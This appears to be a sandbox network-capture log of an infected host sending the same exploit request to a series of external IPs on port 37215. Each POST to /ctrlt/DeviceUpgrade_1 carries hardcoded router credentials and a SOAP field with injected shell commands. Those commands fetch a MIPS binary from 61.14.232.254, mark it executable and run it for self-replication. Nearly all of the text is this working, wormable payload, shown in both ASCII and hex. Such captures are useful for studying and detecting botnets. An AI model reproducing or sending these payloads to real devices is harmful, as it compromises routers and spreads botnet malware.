69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  266192.168.2.1339830113.73.242.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226703882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  267192.168.2.1334506197.103.231.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226726055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  268192.168.2.1333446102.220.91.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226752996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  269192.168.2.1337632197.187.47.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226772070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  270192.168.2.134138641.5.10.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226788044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  271192.168.2.1342510106.201.23.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226808071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  272192.168.2.1354614197.103.204.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226828098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  273192.168.2.1356878197.210.20.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226869106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  274192.168.2.1352194157.54.73.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226876020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  275192.168.2.1360276157.64.187.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227082014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  276192.168.2.1348374157.116.209.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227106094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
